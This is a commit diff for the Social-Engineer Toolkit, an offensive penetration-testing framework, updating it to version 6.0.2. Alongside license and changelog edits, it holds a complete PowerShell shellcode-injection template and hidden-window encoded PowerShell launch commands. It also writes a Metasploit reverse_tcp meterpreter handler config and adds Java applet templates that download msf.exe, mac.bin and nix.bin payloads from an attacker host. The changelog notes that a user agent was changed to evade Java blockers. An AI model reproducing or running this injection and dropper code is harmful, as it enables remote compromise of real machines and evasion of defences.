Updated a number of features

This commit is contained in:
TrustedSec 2014-06-02 10:10:11 -04:00
parent 30fbc15dbe
commit ca9f1fb2cf
11 changed files with 49 additions and 38 deletions

View file

@ -5,8 +5,6 @@ Written by: David Kennedy (ReL1K)
Company: [TrustedSec](https://www.trustedsec.com) Company: [TrustedSec](https://www.trustedsec.com)
Development Team: Thomas Werth, Joey Furr (j0fer), JR DePre (pr1me)
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period. DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
Please read the LICENSE under readme/LICENSE for the licensing of SET. Please read the LICENSE under readme/LICENSE for the licensing of SET.
@ -23,5 +21,3 @@ For bug reports or enhancements, please open an issue here https://github.com/tr
- Linux - Linux
- Windows (experimental) - Windows (experimental)

View file

@ -1,3 +1,17 @@
~~~~~~~~~~~~~~~~
version 6.0.2
~~~~~~~~~~~~~~~~
* changed powershell injection technique to not exitonsession when creating the metasploit.rc file when specified in the powershell menu, this was already enabled when using psexec or other methods
* shrunk the powershell injection code command, not as much length needed - useful for shorter payloads
* slimmed down actual encoded powershell injection code, removed un-used code from the central powershell routine
* fixed a few typos and alignment on licensing agreement within SET and minor silly modifications to license
* fixed coloring when exiting and alignment for purpose of good disclaimer
* added print_status to bleeding edge tracking
* fixed unresponsive powershell injection when uses windows 8
* changed java applet user agent string inside applet to evade java blockers
* removed old ID and value parameters from the Java Applet database, no longer used based on changes through Java 7 update 42 - SET now uses manifest files
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
version 6.0.1 version 6.0.1
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~

View file

@ -62,6 +62,9 @@ Special thanks to the following people who have contributed to SET:
The Social-Engineer Development Team: The Social-Engineer Development Team:
Dave Kennedy (ReL1K) Dave Kennedy (ReL1K)
Former Developers on SET:
JR DePre (pr1me) JR DePre (pr1me)
Thomas Werth Thomas Werth
Joey Furr (j0fer) Joey Furr (j0fer)

View file

@ -1,27 +1,17 @@
Copyright 2013, The Social-Engineer Toolkit (SET) by TrustedSec, LLC Copyright 2014, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
in the documentation and/or other materials provided with the distribution. * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well. The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application. Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug (most likely will never happen) or the beer (also most likely will never happen).
is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
holds the right to refuse the hug or the beer.

View file

@ -145,9 +145,7 @@ try:
print line.rstrip() print line.rstrip()
print bcolors.RED + """ print bcolors.RED + """
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
choice = raw_input("\nDo you agree to the terms of service [y/n]: ") choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
if choice == "yes" or choice == "y": if choice == "yes" or choice == "y":
filewrite = file("src/agreement4", "w") filewrite = file("src/agreement4", "w")
@ -155,7 +153,7 @@ yes (only one time), you agree to the terms of service and that you will only us
filewrite.close() filewrite.close()
print bcolors.ENDC print bcolors.ENDC
else: else:
print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC print bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
sys.exit() sys.exit()
while 1: while 1:

View file

@ -24,6 +24,7 @@ try:
from Crypto.Cipher import AES from Crypto.Cipher import AES
except ImportError: except ImportError:
print "[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications." print "[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications."
pass pass
@ -229,7 +230,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version(): def get_version():
define_version = '6.0' define_version = '6.0.2'
return define_version return define_version
class create_menu: class create_menu:
@ -277,11 +278,13 @@ def meta_path():
else: msf_path = msf_path + "/" else: msf_path = msf_path + "/"
trigger = 0 trigger = 0
if not os.path.isdir(msf_path): if not os.path.isdir(msf_path):
# specific for kali linux # specific for kali linux
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"): if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
msf_path = "/opt/metasploit/apps/pro/msf3/" msf_path = "/opt/metasploit/apps/pro/msf3/"
trigger = 1 trigger = 1
# specific for backtrack5
# specific for backtrack5 and other backtrack versions
if os.path.isfile("/opt/framework3/msf3/msfconsole"): if os.path.isfile("/opt/framework3/msf3/msfconsole"):
msf_path = "/opt/framework3/msf3/" msf_path = "/opt/framework3/msf3/"
trigger = 1 trigger = 1
@ -294,6 +297,7 @@ def meta_path():
if os.path.isfile("/usr/bin/msfconsole"): if os.path.isfile("/usr/bin/msfconsole"):
msf_path = "" msf_path = ""
trigger = 1 trigger = 1
# specific for pwnpad and pwnplug (pwnie express) # specific for pwnpad and pwnplug (pwnie express)
if os.path.isfile("/opt/metasploit-framework/msfconsole"): if os.path.isfile("/opt/metasploit-framework/msfconsole"):
msf_path = "/opt/metasploit-framework" msf_path = "/opt/metasploit-framework"
@ -307,6 +311,8 @@ def meta_path():
print_error("Please configure in the config/set_config.") print_error("Please configure in the config/set_config.")
return_continue() return_continue()
return False return False
# if we are using windows
if check_os() == "windows": if check_os() == "windows":
print_warning("Metasploit payloads are not currently supported. This is coming soon.") print_warning("Metasploit payloads are not currently supported. This is coming soon.")
msf_path = "" msf_path = ""
@ -425,6 +431,8 @@ def bleeding_edge():
print_status("Bleeding edge already active..Moving on..") print_status("Bleeding edge already active..Moving on..")
subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait() subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait()
return True return True
# else lets add them if they want
else: else:
print_status("Adding Kali bleeding edge to sources.list for updates.") print_status("Adding Kali bleeding edge to sources.list for updates.")
# we need to add repo to kali file # we need to add repo to kali file
@ -451,6 +459,7 @@ def update_set():
time.sleep(2) time.sleep(2)
bleeding_edge() bleeding_edge()
# if we aren't running Kali :(
else: else:
peinr_info("Kali-Linux not detected, manually updating..") peinr_info("Kali-Linux not detected, manually updating..")
print_info("Updating the Social-Engineer Toolkit, be patient...") print_info("Updating the Social-Engineer Toolkit, be patient...")
@ -1245,8 +1254,10 @@ def generate_powershell_alphanumeric_payload(payload,ipaddr,port, payload2):
# heres our shellcode prepped and ready to go # heres our shellcode prepped and ready to go
shellcode = newdata[:-1] shellcode = newdata[:-1]
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use # powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use
powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode)) powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
# unicode and base64 encode and return it # unicode and base64 encode and return it
return base64.b64encode(powershell_command.encode('utf_16_le')) return base64.b64encode(powershell_command.encode('utf_16_le'))
@ -1261,7 +1272,6 @@ def generate_shellcode(payload,ipaddr,port):
repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''} repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''}
data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip() data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
# return data # return data
print data
return data return data
# this will take input for shellcode and do a replace for IP addresses # this will take input for shellcode and do a replace for IP addresses
@ -1602,18 +1612,18 @@ def bleeding_edge():
# first check if we are actually using Kali # first check if we are actually using Kali
kali = check_kali() kali = check_kali()
if kali == "Kali": if kali == "Kali":
print "[*] Checking to see if bleeding-edge repos are active." print_status("Checking to see if bleeding-edge repos are active.")
# check if we have the repos enabled first # check if we have the repos enabled first
fileopen = file("/etc/apt/sources.list", "r") fileopen = file("/etc/apt/sources.list", "r")
kalidata = fileopen.read() kalidata = fileopen.read()
if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata: if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata:
print "[*] Bleeding edge already active..Moving on.." print_status("Bleeding edge already active..Moving on..")
return True return True
else: else:
print "[!] Bleeding edge repos were not detected. This is recommended." print_warning("Bleeding edge repos were not detected. This is recommended.")
enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ") enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ")
if enable == "y" or enable == "yes": if enable == "y" or enable == "yes":
print "[*] Adding Kali bleeding edge to sources.list for updates." print_status("Adding Kali bleeding edge to sources.list for updates.")
# we need to add repo to kali file # we need to add repo to kali file
# we will rewrite the entire apt in case not all repos are there # we will rewrite the entire apt in case not all repos are there
filewrite = file("/etc/apt/sources.list", "w") filewrite = file("/etc/apt/sources.list", "w")

View file

@ -183,7 +183,7 @@ def deploy_hex2binary(ipaddr,port,username,password):
x86 = file(setdir + "/x86.powershell", "r") x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read() x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86 x86 = "powershell -nop -win hid -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)

View file

@ -64,7 +64,7 @@ try:
x86 = file(setdir + "/x86.powershell", "r") x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read() x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -enc " + x86 x86 = "powershell -nop -win hid -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)

View file

@ -40,7 +40,7 @@ if powershell_menu_choice != "99":
# here we format everything for us # here we format everything for us
x86 = file(setdir + "/x86.powershell", "r") x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read() x86 = x86.read()
x86 = "powershell -nop -windows hidden -noni -enc " + x86 x86 = "powershell -nop -win hid -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)
@ -53,7 +53,7 @@ if powershell_menu_choice != "99":
# if we want to start the listener # if we want to start the listener
if choice == 'YES': if choice == 'YES':
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w") filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port)) filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
filewrite.close() filewrite.close()
msf_path = meta_path() msf_path = meta_path()
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait() subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()

View file

@ -1 +1 @@
<applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar"><param name="name" value="IDREPLACEHERE"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet> <applet code="Java.class" width="1" height="1" archive="Signed_Update.jar"><param name="name"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>

View file

@ -1 +1 @@
<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar"><param name="WINDOWSPLZ" value="http://ipaddrhere/msf.exe"><param name="ILIKESTUFF" value=""><param name="OSX" value="http://ipaddrhere/mac.bin"><param name="LINUX" value="http://ipaddrhere/nix.bin"><param name="X64" value=""><param name="X86" value=""><param name="HUGSNOTDRUGS" value="freehugs"><param name="LAUNCH" value="YES"><param name="nextPage" value=""><param name="separate_jvm" value="true"></applet> <applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar"><param name="name" value="IDREPLACEHERE"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>